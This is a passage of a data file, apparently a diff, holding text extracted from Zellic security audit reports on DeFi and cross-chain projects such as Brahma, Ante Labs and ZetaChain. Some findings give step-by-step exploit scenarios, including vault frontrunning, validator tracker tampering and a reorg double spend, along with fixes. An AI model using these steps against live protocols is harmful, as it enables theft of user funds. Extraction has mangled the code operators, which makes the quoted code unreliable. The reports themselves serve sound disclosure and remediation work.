:) v.ExchangeRate.Sub(median) sum = sum.Add(deviation.Mul(deviation)) } The standard deviation for the ballots is used directly as the rewardSpread if it is greater than the calculated rewardSpread. if standardDeviation.GT(rewardSpread) { rewardSpread = standardDeviation The StandardDeviation function, however, does not ignore negative votes. This could allow a malicious validator to submit abstaining votes with very large negative values and increase the rewardSpread. Zellic Nibiru Two malicious validators could collude to repeatedly submit prices outside the ac- ceptable price band. They can do this without being slashed due to rewardSpread having a very high value. If eventually the attacker succeeds in publishing an invalid price, they could profit by liquidating strong postions through the perp module. Abstained votes should be ignored when calculating the standard deviation for the ballots. This issue has been acknowledged by Nibiru, and a fix was implemented in commit 908571f0. Zellic Nibiru", + "html_url": "https://github.com/Zellic/publications/blob/master/Nibiru - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Deposits can be potentially frontrun and stolen", + "labels": [ + "Zellic" + ], + "body": "Target: Vault Category: Business Logic Likelihood: Medium Severity: High : High The shares minted in deposit() are calculated as a ratio of totalVaultFunds() and tot alSupply(). The totalVaultFunds() can be potentially inflated, reducing the amounts of shares minted (even 0). function deposit(uint256 amountIn, address receiver) ...)) shares = totalSupply() > 0 ? (totalSupply() * amountIn) / totalVaultFunds() : amountIn; IERC20(wantToken).safeTransferFrom(receiver, address(this), amountIn); _mint(receiver, shares); } ...)) function totalVaultFunds() public view returns (uint256) { return IERC20(wantToken).balanceOf(address(this)) + totalExecutorFunds(); } By transferring wantToken tokens directly, totalVaultFunds() would be inflated (be- cause of balanceOf()) and as the division result is floored, there could be a case when it would essentially mint 0 shares, causing a loss for the depositing user. If an attacker controls all of the share supply before the deposit, they would be be able to withdraw all the user deposited tokens. Consider the following attack scenario: Zellic Brahma 1. The Vault contract is deployed. 2. The governance sets batcherOnlyDeposit to false. 3. The attacker deposits[1] X stakeable tokens and receives X LP tokens. 4. The victim tries to deposit Y stakeable tokens. 5. The attacker frontruns the victim\u2019s transaction and transfers[2] X * (Y - 1) + 1 stakeable tokens to the Vault contract. 6. The victim\u2019s transaction is executed, and the victim receives 0 LP tokens.[3] 7. The attacker redeems her LP tokens, effectively stealing Y stakeable tokens from the victim. The foregoing is just an example. Variations of the foregoing attack scenario are pos- sible. The impact of this finding is mitigated by the fact that the default value of batcherOn lyDeposit is true, which allows the keeper of the Batcher contract to: 1) prevent the attacker from acquiring 100% of the total supply of LP tokens; 2) prevent the attacker from redeeming her LP tokens for stakeable tokens. Consider: adding an amountOutMin parameter to the deposit(uint256 amountIn, address receiver) function of the Vault contract; adding a require statement that ensures that the deposit() function never mints 0 or less than amountOutMin LP tokens. The issue has been acknowledged by Brahma and mitigated in commit 413b9cc. 1 By calling the deposit() function of the Vault contract. 2 By calling the transfer() function of the stakeable token contract. This doesn\u2019t increase the total supply of LP tokens. The attacker is always able to call transfer() to directly transfer stakeable tokens to the Vault contract, even when batcherOnlyDeposit is set to true. 3 The formula for calculating the number of LP tokens received: LPTokensReceived = Y * totalSupply OfLPTokens / totalStakeableTokensInVault. Substitute totalSupplyOfLPTokens = X and totalStake ableTokensInVault = X + X * (Y - 1) + 1. The result: LPTokensReceived = Y * X / (X + X * (Y - 1) + 1) = Y * X / (X * Y + 1) = 0. Zellic Brahma", + "html_url": "https://github.com/Zellic/publications/blob/master/BrahmaFi - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Centralization risks", + "labels": [ + "Zellic" + ], + "body": "Target: Batcher, Vault, ConvexTradeExecutor, PerpTradeExecutor, Harvester, Per pPositionHandlerL2 Category: Code Maturity Likelihood: n/a Severity: High : High The protocol is heavily centralized. This may be by design due to the the nature of yield aggregators. The governance can call the sweep() function of the Batcher, Vault, ConvexTradeExecut or, PerpTradeExecutor and Harvester contracts, effectively draining the token balances of the aforementioned contracts. The strategist can call the sweep() function of the PerpPositionHandlerL2 contract, effectively draining the token balances of the aforementioned contract. The documentation states that 1-10% of the user-deposited funds stay within the vault as a buffer and only the yield harvested from Curve and Convex is used for trading on Perpetual Protocol. These invariants are not enforced in any way in the Vault contract itself. The keeper can freely move the user-deposited funds between the vault and its trade executors. It is therefore the responsibility of keepers to enforce the aforemen- tioned invariants Centralization carries heavy risks, most of which have been outlined in the section above. A compromised governance, strategist or a keeper could potentially steal all user funds. Consider setting up multisig wallets for the governance, the strategist and the keeper. Consider enforcing, on the protocol level, the invariants outlined in the docu- mentation. Consider following best security practices when handling the private keys of the externally-owned accounts. Zellic Brahma The issue has been acknowledged by the Brahma team. Further steps to securing private keys and usage of a multisig address are being addressed. Zellic Brahma", + "html_url": "https://github.com/Zellic/publications/blob/master/BrahmaFi - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Unwanted deposits and withdrawals can be triggered on behalf of another user", + "labels": [ + "Zellic" + ], + "body": "Target: Vault Category: Business Logic Likelihood: Medium Severity: High : High The deposit() and withdraw() functions of the Vault contract accept 2 arguments: function deposit(uint256 amountIn, address receiver) public override nonReentrant ensureFeesAreCollected returns (uint256 shares) { } ///)) checks for only batcher deposit onlyBatcher(); ...)) function withdraw(uint256 sharesIn, address receiver) public override nonReentrant ensureFeesAreCollected returns (uint256 amountOut) { } ///)) checks for only batcher withdrawal onlyBatcher(); ...)) Both of the functions call onlyBatcher() to check and enforce the validity of msg.send er: function onlyBatcher() internal view { if (batcherOnlyDeposit) { Zellic Brahma require(msg.sender =) batcher, \u201cONLY_BATCHER\u201d); } } Both of the functions perform no other checks of the validity of msg.sender. By default (batcherOnlyDeposit = true), only the Batcher contract can deposit and withdraw funds on behalf of the receiver. The governance can change batcherOnlyDeposit to false. When batcherOnlyDepo sit = false, the deposit() and withdraw() functions perform no msg.sender valid- ity checks whatsoever, allowing any third-party user to trigger deposits[4] and with- drawals[5] on behalf of any receiver. A third party can trigger unwanted deposits and withdrawals on behalf of another user. This can lead to the users\u2019 confusion, lost profits and even potentially to a loss of funds. Consider adding if (!batcherOnlyDeposit) { require(msg.sender =) receiver); } checks to the deposit() and withdraw() functions. The issue has been fixed in commit 32d30c8. 4 Deposits only work if the receiver has approve()d enough of stakeable tokens. 5 Withdrawals only work if the receiver owns enough of the vault LP tokens. Zellic Brahma", + "html_url": "https://github.com/Zellic/publications/blob/master/BrahmaFi - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Some emergency-only functions can be called outside of an emergency state", + "labels": [ + "Zellic" + ], + "body": "Target: Batcher, Vault, ConvexTradeExecutor, PerpTradeExecutor, Harvester, Per pPositionHandlerL2 Category: Business Logic Likelihood: High Severity: Medium : Medium The project contains 6 contracts that implement a sweep() function: Batcher Vault ConvexTradeExecutor (derived from BaseTradeExecutor) PerpTradeExecutor (derived from BaseTradeExecutor) Harvester PerpPositionHandlerL2 The sweep() functions in Batcher, Vault, ConvexTradeExecutor and PerpTradeExecutor are documented as callable only in an emergency state. Only the sweep() function in Vault implements emergency state checks. The sweep() functions in all other contracts do not. The emergency-only sweep() functions in Batcher, ConvexTradeExecutor and PerpTra deExecutor can be called outside of an emergency state. The sweep() functions in Harvester and PerpPositionHandlerL2 can also be called out- side of an emergency state, but they are not documented as callable only in an emer- gency state. Consider adding emergency state checks to the sweep() functions of the Batcher, Con vexTradeExecutor and PerpTradeExecutor contracts. Consider adding emergency state checks to the sweep() function of the Harvester con- tract and documenting it accordingly. Consider: 1) adding an emergency state variable to the PerpPositionHandlerL2 con- Zellic Brahma tract;[6] 2) adding emergency state checks to the sweep() function of the PerpPositio nHandlerL2 contract; 3) documenting this accordingly. The issue has been acknowledged by the Brahma team. 6 This step is required because the PerpPositionHandlerL2 is deployed on top of Optimism, an L2 net- work, and therefore (and unlike all the other contracts) cannot access the emergency state variable of the Vault contract in a timely manner. Zellic Brahma", + "html_url": "https://github.com/Zellic/publications/blob/master/BrahmaFi - Zellic Audit Report.pdf" + }, + { + "title": "3.5 Invalid business logic in Batcher.sol", + "labels": [ + "Zellic" + ], + "body": "Target: Batcher.sol Category: Coding Mistakes Likelihood: n/a Severity: Medium : Medium The depositFunds() function of the Batcher contract contains this incorrect require statement at L94: require( IERC20(vaultInfo.vaultAddress).totalSupply() \u2212 pendingDeposit + pendingWithdrawal + amountIn <) vaultInfo.maxAmount, \u201cMAX_LIMIT_EXCEEDED\u201d ); The correct require statement should contain - pendingWithdrawal + pendingDeposit instead of - pendingDeposit + pendingWithdrawal. The incorrect require statement fails to properly enforce the \u201cusers can deposit only up to vaultInfo.maxAmount of stakeable tokens\u201d invariant. Consider changing - pendingDeposit + pendingWithdrawal to - pendingWithdrawal + pendingDeposit in the require statement. The issue has been mitigated and fixed accordingly in commit 0c2c815. Zellic Brahma", + "html_url": "https://github.com/Zellic/publications/blob/master/BrahmaFi - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Ability to force tests to fail with gas limit", + "labels": [ + "Zellic" + ], + "body": "Target: AntePool Category: Coding Mistakes Likelihood: Medium Severity: Critical : Critical It is possible for attackers to force tests to fails by setting the gas limit to a very specific value to where: it is low enough that the inner call to checkTestPasses runs out of gas, but it is high enough that the outer checkTest/checkTestNoRevert functions finish ex- ecuting. This is possible because of a feature in Solidity where try/catch statements revert before the last 1/64th of the transaction gas limit is consumed (Source): The caller always retains at least 1/64th of the gas in a call and thus even if the called contract goes out of gas, the caller still has some gas left. So, if 1/64th of the maximum gas value that causes the test to revert is enough to execute the remainder of checkTest, it is possible to force a test to fail. Zellic wrote a proof of concept exploit to verify the exploitability of this issue. An attacker could force certain pools to fail and claim their rewards. Note that as of the time of this writing, no community-written, deployed tests are vulnerable. It is not currently possible to directly detect an out-of-gas error in a try/catch. Zellic and Ante Labs determined that the best solution is to implement magic return values so that pools can distinguish between a \u201cfalse\u201d returned by an out-of-gas reversion and a test failure (indicated by returning false or manual reversion). Zellic Ante Labs Ante Labs acknowledged this finding and plans to implement a fix\u2014most likely using the magic return value method described in the section. In the meantime, Ante Labs plans to provide analysis tools to community test writers to lower the likelihood of a vulnerable test being deployed. Note that no community- written, deployed tests are vulnerable as of the time of this writing. Zellic Ante Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Ante - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Number of challengers is constrained by block gas limit", + "labels": [ + "Zellic" + ], + "body": "Target: AntePool Category: Coding Mistakes Likelihood: Low Severity: High : Critical An attacker can freeze funds for a low cost by causing the _calculateChallengerEligi bility function to hit the block gas limit. Since the loop iterates over every challenger in storage, if enough challengers are registered, the checkTest function will not be callable when the test fails. Front-running bots may be able to claim the majority of rewards by exploiting the block gas limit issue using the following steps: 1. Upon detecting a failed check, depositing a large amount of capital as chal- lenger. 2. Locking checkTest by registering many challengers. 3. Twelve blocks later, unlocking checkTest by removing them. 4. Calling checkTest to claim rewards and 5% bounty. Stakers could prevent checkTest from running until their funds are unstaked after realizing a test is going to fail. An attacker could perform griefing attacks to prevent payouts from failed checks. Note that this vulnerability can be chained with the MIN_CHALLENGER_STAKE bypass vul- nerability to significantly lower the attack cost. We determined that in practice, ex- ploiting these two vulnerabilities together to lock funds would cost approximately $60,000 USD due to block gas as of the time of this writing. An attack is especially likely if the profit of delaying checkTest exceeds the cost of the attack. We recommend dynamically calculating the MIN_CHALLENGER_STAKE so that it is eco- nomically impractical to perform this attack. For recommendations on mitigating the minimum challenger stake bypass vulnera- bility, see the finding in section 3.3. Zellic Ante Labs Ante Labs acknowledged this finding and implemented a fix in commit a9490290d231 91d2bbcc2acfce5c901aed1bb5d2. Zellic Ante Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Ante - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Bypassable minimum challenger stake", + "labels": [ + "Zellic" + ], + "body": "Target: AntePool Category: Coding Mistakes Likelihood: High Severity: Low : Low It is possible to bypass the following check in the stake function. This would allow malicious challengers to stake less than the minimum of MIN_CHALLENGER_STAKE (default 1e16 or 0.01 ether) ether: require(amount >) MIN_CHALLENGER_STAKE, \u201cANTE: Challenger must stake more than 0.01 ETH\u201d); To bypass the MIN_CHALLENGER_STAKE, challengers can 1. Call the stake function to stake MIN_CHALLENGER_STAKE 2. In the same transaction, call the unstake (internally _unstake) function to unstake MIN_CHALLENGER_STAKE - 1 Now, the challenger is still registered while only costing 1 base unit (0.00000001 ether) and block gas fees. Front-running bots could register a challenger on every test for a very low cost to steal the 5% bounty when a test fails. If challengers wish to withdraw enough challenger stake that their total staked amount becomes less than MIN_CHALLENGER_STAKE, require that all of their stake be removed: function _unstake( uint256 amount, bool isChallenger, PoolSideInfo storage side, UserInfo storage user ) internal { Zellic Ante Labs /) Calculate how much the user has available to unstake, including the /) effects of any previously accrued decay. /) prevAmount = startAmount * decayMultiplier / startDecayMultiplier uint256 prevAmount = _storedBalance(user, side); if (prevAmount == amount) { user.startAmount = 0; user.startDecayMultiplier = 0; side.numUsers = side.numUsers.sub(1); /) Remove from set of existing challengers if (isChallenger) challengers.remove(msg.sender); } else { require(amount <) prevAmount, \u201cANTE: Withdraw request exceeds balance.\u201d); require(!isChallenger |) prevAmount.sub(amount) > MIN_CHALLENGER_STAKE, \u201cANTE: must withdraw at least MIN_CHALLENGER_STAKE\u201d); user.startAmount = prevAmount.sub(amount); /) Reset the startDecayMultiplier for this user, since we've updated /) the startAmount to include any already-accrued decay. user.startDecayMultiplier = side.decayMultiplier; } side.totalAmount = side.totalAmount.sub(amount); emit Unstake(msg.sender, amount, isChallenger); } For recommendations on mitigating the maximum challengers limit due to block gas limit vulnerability, see the finding in section 3.2. Ante Labs acknowledged this finding and implemented a fix in commit 8e4db312c704 6db3f76146080f166baeab025acb. Zellic Ante Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Ante - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Reentrant checkTest allows pool draining", + "labels": [ + "Zellic" + ], + "body": "Target: AntePool Category: Coding Mistakes Likelihood: Low Severity: Medium : Critical Because checkTest allows reentrancy, in specific cases, an attacker may be able to drain AntePool by 1. Calling checkTest on a test that returns false (not one that reverts). The test must be written in a way that causes the contract to make an external call to an attacker contract. The attacker contract repeats step 1 as many times as desired. 2. After entering the if condition, the _verifier is changed to the current caller. 3. The current caller calls claim after checkTest returns. Steps 2\u20133 repeat for each reentrant call to checkTest, causing the 5% bounty to be claimed multiple times. For this to be exploitable, a test must be able to return false without reverting. not have a checkTestPasses function that is view or pure. call a function on the tested contract that internally makes an external call (e.g. to fallback or receive) to an attacker-controlled contract, for whatever reason. If a test fails on a contract matching certain requirements, an attacker could drain the majority of the pool by repeatedly changing the verifier and claiming bounties. We recommend using the nonReentrant modifier or otherwise preventing the checkT est function from allowing reentrancy. Ante Labs acknowledged this finding and implemented a fix in commit 8448a63d3c7f 7303e35cfc63807cdad540d3aa85. Zellic Ante Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Ante - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Potential integer underflow in calculateAllocation", + "labels": [ + "Zellic" + ], + "body": "Target: SpecToken Category: Coding Mistakes Likelihood: N/A Severity: Informational : Informational The addToWhitelist function allows the owner to update the allocation amount at any time during the whitelistAddEnd period. The totalAllocation variable is calculated as follows: uint256 totalAllocation = currentMonth * allocations[_account].monthlyAllocation + allocations[_account].initialAllocation; If the value of totalAllocation is less than the totalSpent[_account] total amount (i.e., the amount of token that has been transferred out, other than that transferred to the veTokenMigrator address), the following calculation will underflow, causing a reversion: return totalAllocation - totalSpent[_account]; This may happen if the owner calls addToWhitelist and decreases the initialAlloca tion or monthlyAllocation amounts. The calculateAllocation function provides less configurability than likely intended as the owner cannot always decrease the allocation configuration. Regardless, we recommend preventing underflows to improve correctness (enabling formal verification in the future) and make errors more easily debuggable. Use the maximum value between 0 and totalAllocation - totalSpent[_account]: Zellic Spectral Finance function calculateAllocation(address _account) public view returns (uint256) { uint256 currentMonth = calculateCurrentMonth(); if(currentMonth < 12){ return 0; /)12 month cliff } uint256 totalAllocation = currentMonth * allocations[_account].monthlyAllocation + allocations[_account].initialAllocation; if (totalAllocation < totalSpent[_account]) return 0; return totalAllocation - totalSpent[_account]; } This issue has been acknowledged by Spectral Finance, and a fix was implemented in commit d39c89a3. Zellic Spectral Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Spectral Token - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Any ZetaSent events are processed regardless of what con- tract emits them", + "labels": [ + "Zellic" + ], + "body": "Target: evm_hooks.go Category: Coding Mistakes Likelihood: High Severity: Critical : Critical The main method through which funds are intended to be bridged over from the zEVM to another chain is by calling the send() function in the zEVM\u2019s ZetaConnectorZEVM contract. This function emits a ZetaSent event, which is intended to be processed by the crosschain module\u2019s PostTxProcessing() hook. It is crucial that this function checks to ensure that any ZetaSent event it picks up originated from the ZetaConnectorZEVM contract. Otherwise, any malicious attacker can deploy their own contract on the zEVM and emit arbitrary ZetaSent events to send arbitrary amounts of ZETA without actually holding any ZETA. Inside the PostTxProcessing() hook, we see the following: func (k Keeper) PostTxProcessing( ctx sdk.Context, msg core.Message, receipt *ethtypes.Receipt, ) error { target :) receipt.ContractAddress if msg.To() !) nil { target = *msg.To() } for _, log :) range receipt.Logs { eZRC20, err :) ParseZRC20WithdrawalEvent(*log) if err =) nil { if err :) k.ProcessZRC20WithdrawalEvent(ctx, eZRC20, target, \"\"); err !) nil { return err Zellic ZetaChain } } eZeta, err :) ParseZetaSentEvent(*log) if err =) nil { if err :) k.ProcessZetaSentEvent(ctx, eZeta, target, \"\"); err return err !) nil { } } } return nil } The receipt parameter of this function contains information about transactions that occur on the zEVM. This function iterates through all logs (i.e., emitted events) in each receipt and attempts to parse the events as Withdrawal or ZetaSent events. However, there is no check to ensure that these events originate from the ZetaCon- nectorZEVM contract. This allows a malicious attacker to deploy their own contract on the zEVM, which would allow them to emit arbitrary ZetaSent events, and thus gain access to ZETA tokens that they otherwise should not have access to. The prototype of the ZetaSent event is as follows: event ZetaSent( address sourceTxOriginAddress, address indexed zetaTxSenderAddress, uint256 indexed destinationChainId, bytes destinationAddress, uint256 zetaValueAndGas, uint256 destinationGasLimit, bytes message, bytes zetaParams ); It is important to note that Withdrawal events are not affected by this bug. The Proc essZRC20WithdrawalEvent() function checks and ensures that the event was emitted from a whitelisted ZRC20 token contract address. Zellic ZetaChain Add a check to ensure that ZetaSent events are only processed if they are emitted from the ZetaConnectorZEVM contract. This issue has been acknowledged by ZetaChain, and a fix was implemented in com- mit 8a988ae9. Zellic ZetaChain", + "html_url": "https://github.com/Zellic/publications/blob/master/ZetaChain - 6.30.23 Zellic Audit Report.pdf" + }, + { + "title": "3.2 Bonded validators can trigger reverts for successful trans- actions", + "labels": [ + "Zellic" + ], + "body": "Target: keeper_out_tx_tracker.go Category: Coding Mistakes Likelihood: High Severity: Critical : Critical A single bonded validator has the ability to add or remove transactions from the out tracker, as the only check is that they are bonded. func (k msgServer) AddToOutTxTracker(goCtx context.Context, msg *types.MsgAddToOutTxTracker) (*types.MsgAddToOutTxTrackerResponse, error) { ctx :) sdk.UnwrapSDKContext(goCtx) /) Zellic: this is the only relevant check validators :) k.StakingKeeper.GetAllValidators(ctx) if !IsBondedValidator(msg.Creator, validators) &) msg.Creator !) types.AdminKey { return nil, sdkerrors.Wrap(sdkerrors.ErrorInvalidSigner, fmt.Sprintf(\"signer %s is not a bonded validator\", msg.Creator)) } /) [ ...)) ] } func (k msgServer) RemoveFromOutTxTracker(goCtx context.Context, msg *types.MsgRemoveFromOutTxTracker) (*types.MsgRemoveFromOutTxTrackerResponse, error) { ctx :) sdk.UnwrapSDKContext(goCtx) validators :) k.StakingKeeper.GetAllValidators(ctx) if !IsBondedValidator(msg.Creator, validators) &) msg.Creator !) types.AdminKey { return nil, sdkerrors.Wrap(sdkerrors.ErrorInvalidSigner, fmt.Sprintf(\"signer %s is not a bonded validator\", msg.Creator)) } Zellic ZetaChain k.RemoveOutTxTracker(ctx, msg.ChainId, msg.Nonce) return &types.MsgRemoveFromOutTxTrackerResponse{}, nil } This allows a malicious validator to remove an entry from the out transaction tracker and replace it with another one. One way to exploit this would be to 1. Initiate a Goerli->Goerli message sending some ZETA by calling ZetaConnectorE th.send on the Goerli chain. 2. After processing the incoming events, a new transaction will be signed, sending the ZETA back to the Goerli chain in signer.TryProcessOutTx and then adding to the outgoing transaction tracker. 3. The malicious validator can then remove that transaction using tx crosschain r emove-from-out-tx-tracker 1337 nonce and add a different transaction that has previously failed (any failed hash will do) using the original nonce. 4. Then, observeOutTx will pick up this fake transaction from the tracker and add it to ob.outTXConfirmedReceipts and ob.outTXConfirmedTransaction. 5. Next, IsSendOutTxProcessed is run using this fake receipt and PostReceiveConfi rmation is called, marking that status as ReceiveStatus_Failed. 6. The flow then continues on to revert the cross-chain transactions (CCTXs) and return the ZETA even though the original transaction went through, causing more ZETA to be transferred than was originally sent. Here is what the attacker\u2019s ZETA balance would look like when performing the above attack: 900000000000000000000 /) initial balance 890000000000000000000 /) balance after triggering ZetaConnectorEth.send 897999999999799398194 /) balance after receiving funds from the deleted out tracker tx 903999999999398194581 /) balance after receiving the revert funds Zellic ZetaChain Consider whether a single validator should be able to remove transactions from the out tracker or whether it could be done via a vote. If it is unnecessary, then the feature should be removed. The observeOutTx method could be hardened to ensure that the sender of the transac- tion is the correct threshold signature scheme (TSS) address and that the nonce of the transaction matches the expected value. This does not prevent a malicious validator from removing legitimate transactions from the tracker and locking up funds. This issue has been acknowledged by ZetaChain, and a fix was implemented in com- mit\u2019s 24d4f9eb and 8222734c. Zellic ZetaChain", + "html_url": "https://github.com/Zellic/publications/blob/master/ZetaChain - 6.30.23 Zellic Audit Report.pdf" + }, + { + "title": "3.3 Sending ZETA to a Bitcoin network results in BTC being sent instead", + "labels": [ + "Zellic" + ], + "body": "Target: btc_signer.go Category: Coding Mistakes Likelihood: High Severity: Critical : Critical There are three different types of coin that can be sent via outgoing transactions, which are CoinType_Zeta, CoinType_Gas, and CoinType_ERC20. The observer will call go signer.TryProcessOutTx(send, outTxMan, outTxID, chainC lient, co.bridge) on each of the current out transactions, and it is up to the signer implementation for each chain to handle the different coin types. The EVMSigner cor- rectly handles all the coin types, but the BTCSigner assumes that all the transactions are of type CoinType_Gas. func (signer *BTCSigner) TryProcessOutTx(send *types.CrossChainTx, outTxMan *OutTxProcessorManager, outTxID string, chainclient ChainClient, zetaBridge *ZetaCoreBridge) { /) [ ...)) ] /) Zellic: - incorrect assumption of CoinType_Gas here included, confirmed, _ :) btcClient.IsSendOutTxProcessed(send.Index, int(send.GetCurrentOutTxParam().OutboundTxTssNonce), common.CoinType_Gas) if included |) confirmed { logger.Info().Msgf(\"CCTX already processed; exit signer\") return } /) [ ...)) ] If you try to send ZETA to a Bitcoin chain using ZetaConnectorZEVM.send on the zEVM, it will generate an outgoing CCTX with a coin type of CoinType_Zeta and an Amount of the ZETA that was burnt. This will then get picked up by the BTCSigner and processed as if it was a CoinType_Gas, which directly sends Amount / 1e8 (the BTC gas coin has decimals of 8 in zEVM) of BTC to the receiver. Zellic ZetaChain This allows someone to burn a tiny fraction of a ZETA (1/1e10) and receive one BTC in return. The BTCSigner should reject any transactions that are not of type CoinType_Gas. The EvmHooks could check to ensure that the destination chain supports CoinType_Zeta and could reject any transactions before they reach the inbound tracker. This issue has been acknowledged by ZetaChain, and a fix was implemented in com- mit 630c515f. Zellic ZetaChain", + "html_url": "https://github.com/Zellic/publications/blob/master/ZetaChain - 6.30.23 Zellic Audit Report.pdf" + }, + { + "title": "3.4 Race condition in Bitcoin client leads to double spend", + "labels": [ + "Zellic" + ], + "body": "Target: btc_signer.go Category: Coding Mistakes Likelihood: High Severity: Critical : Critical The Bitcoin client is used to watch for cross-chain transactions as well as to relay transactions to and from the Bitcoin chain. There are numerous functions in the client, but the relevant functions are described below: 1. IsSendOutTxProcessed() - Checks the ob.submittedTx[outTxID] to see whether the transaction in question has already been submitted for relaying. 2. startSendScheduler() - Runs every three seconds. This function gets all pending CCTX and checks if they have already been submitted with IsSendOutTxProces sed(). If the CCTX has not been submitted, it will call TryProcessOutTx(). 3. TryProcessOutTx() - Signs and broadcasts a CCTX, then adds it to a tracker in the x/crosschain module with AddTxHashToOutTxTracker(). 4. observeOutTx() - Runs every two seconds. It queries for all transactions that have been added to the tracker in the x/crosschain module and adds them to ob.submittedTx[outTxID]. The bug here occurs due to the racy check in IsSendOutTxProcessed(). More specifi- cally, the following scenario would lead to the bug: 1. First, startSendScheduler() runs and gets a pending CCTX. It checks that the CCTX has not been processed (i.e., has not been added to ob.submittedTx[], so IsSendOutTxProcessed() returns false), and thus calls TryProcessOutTx(). 2. Then, TryProcessOutTx() signs the CCTX and broadcasts it, then adds it to the tracker in the x/crosschain module. 3. After, startSendScheduler() runs again before observeOutTx() is able to run. The CCTX is in the x/crosschain module tracker but not yet in ob.submittedTx[] since observeOutTx() has not run yet. Therefore, TryProcessOutTx() is called again. Zellic ZetaChain 4. Then TryProcessOutTx() runs, signs, broadcasts, and adds the same CCTX to the tracker in the x/crosschain module. 5. Finally, observeOutTx() runs and adds (or in this case, overwrites) the CCTX to ob.submittedTx[]. The bug occurs in step 3. Since observeOutTx() is responsible for adding the CCTX to the ob.submittedTx[] map, the intention is for observeOutTx() to run before startSe ndScheduler() runs again. Due to the racy nature of the code though, this does not happen, and thus the bug is triggered. The bug triggers with the current smoke tests by modifying the following line of code in bitcoin_client.go to make observeOutTx() run every 30 seconds. func (ob *BitcoinChainClient) observeOutTx() { ticker :) time.NewTicker(30 * time.Second) /) [ ...)) ] } A naive fix for this bug is to modify IsSendOutTxProcessed() to make it query for pend- ing CCTXs in the x/crosschain module\u2019s tracker instead. This will prevent this issue from occurring, as startSendScheduler() and TryProcessOutTx() run synchronously. Although the above fix is sufficient for this specific issue, we find it important to note that the code here is multithreaded and accesses ob.submittedTx[] asynchronously without any locking involved. Additionally, ob.submittedTx[] is often out of sync with the tracker in the x/crosschain module. Code like this is prone to similar bugs, and it is especially prone to bugs being introduced in the future. Because of this, it is our recommendation that the ZetaChain team do a thorough refactoring of the code to in- troduce synchronization between the functions. This would eliminate the racy nature of the code and make it less likely for bugs to be introduced in the future. This issue has been acknowledged by ZetaChain. Zellic ZetaChain", + "html_url": "https://github.com/Zellic/publications/blob/master/ZetaChain - 6.30.23 Zellic Audit Report.pdf" + }, + { + "title": "3.5 Not waiting for minimum number of block confirmations re- sults in double spend", + "labels": [ + "Zellic" + ], + "body": "Target: btc_client.go Category: Coding Mistakes Likelihood: Medium Severity: Critical : Critical Forks of length 1 (that is, a reorganization of one block in the blockchain) happen semifrequently in the Bitcoin chain. This occurs when two miners mine a winning nonce at nearly the same time. When this occurs, each full node will consider the first block it sees (from either miner) to be the best block for that block height. This would mean that for a short period of time, nodes will be divided on which block should be part of the canonical chain. Some nodes will continue with block A, while the others will continue with block B. The way the nodes come to consensus on which chaintip to follow is by waiting to see which chaintip pulls ahead of the other by adding another block. When this occurs, all nodes that are not on this chaintip will reorganize to the longest chaintip. Note that forks of length greater than 1 can also occur, but the probability of it occurring goes down as the length goes up. In Satoshi\u2019s Bitcoin whitepaper, it is recommended that applications wait for six block confirmations after a transaction before considering it to be part of the canonical chain (i.e., confirmed and irreversible). This assumes that a malicious attacker who is attempting to construct a malicious chaintip has access to ~10% of the total hashing power of all nodes on the chain. In the Bitcoin client, there is a state variable for the amount of block confirmations that the code must wait before considering a transaction as confirmed. type BitcoinChainClient struct { /) [ ...)) ] confCount int64 /) must wait this many blocks to be considered \"confirmed\" /) [ ...)) ] } However, this variable is not used anywhere in the code. The client assumes that Zellic ZetaChain any transaction it sees in new blocks are confirmed, and it will create and broadcast CCTXs immediately. This causes an issue, because if the Bitcoin chain reorganizes at any point in time after the CCTX has been created, the Bitcoin transaction will revert, but funds will have already been sent across to the zEVM. To demonstrate this in the local testing environment, we used the invalidateblock RPC call. The steps for the attack are as follows: 1. Send 1 BTC from the smoketest wallet to the Bitcoin TSS address bcrt1q7cj32g6 scwdaa5sq08t7dqn7jf7ny9lrqhgrwz. 2. Mine a block using the generatetoaddress RPC. 3. Confirm that the transaction was included, either by checking the client logs for the CCTX or using a block explorer such as btc-rpc-explorer. 4. Use the invalidateblock RPC to invalidate the block that the transaction oc- curred in. The above steps will result in a CCTX being generated for 1 BTC to be sent to the zEVM. However, due to the reorganization triggered in step 4, the 1 BTC that was sent in step 1 will remain in the smoketest wallet. Therefore, 1 BTC will essentially have been minted in the zEVM. The Bitcoin client should wait for a minimum number of block confirmations before assuming that a block has been confirmed. The recommended number is six block confirmations according to the Bitcoin whitepaper. This issue has been acknowledged by ZetaChain, and a fix was implemented in com- mit c276e903. Zellic ZetaChain", + "html_url": "https://github.com/Zellic/publications/blob/master/ZetaChain - 6.30.23 Zellic Audit Report.pdf" + }, + { + "title": "3.6 Multiple events in the same transaction causes loss of funds and chain halting", + "labels": [ + "Zellic" + ], + "body": "Target: evm_hooks.go Category: Coding Mistakes Likelihood: High Severity: Critical : Critical The ProcessZetaSentEvent() and ProcessZRC20WithdrawalEvent() functions are used to process ZetaSent and Withdrawal events respectively. These events are emitted by the ZetaConnectorZEVM contract. These functions first use the parameters of the emitted event to create a new MsgSen dVoter message. It then hashes this message and uses the hash as an index to create a new CCTX. The relevant code in ProcessZetaSentEvent() is shown below: func (k Keeper) PostTxProcessing(/) ...)) *)) error { /) [ ...)) ] for _, log :) range receipt.Logs { /) [ ...)) ] eZeta, err :) ParseZetaSentEvent(*log) if err =) nil { if err :) k.ProcessZetaSentEvent(ctx, eZeta, target, \"\"); err return err !) nil { } } } return nil } func (k Keeper) ProcessZetaSentEvent(ctx sdk.Context, event *contracts.ZetaConnectorZEVMZetaSent, contract ethcommon.Address, txOrigin string) error { /) [ ...)) ] msg :) zetacoretypes.NewMsgSendVoter(\"\", contract.Hex(), Zellic ZetaChain senderChain.ChainId, txOrigin, toAddr, receiverChain.ChainId, amount, \"\", 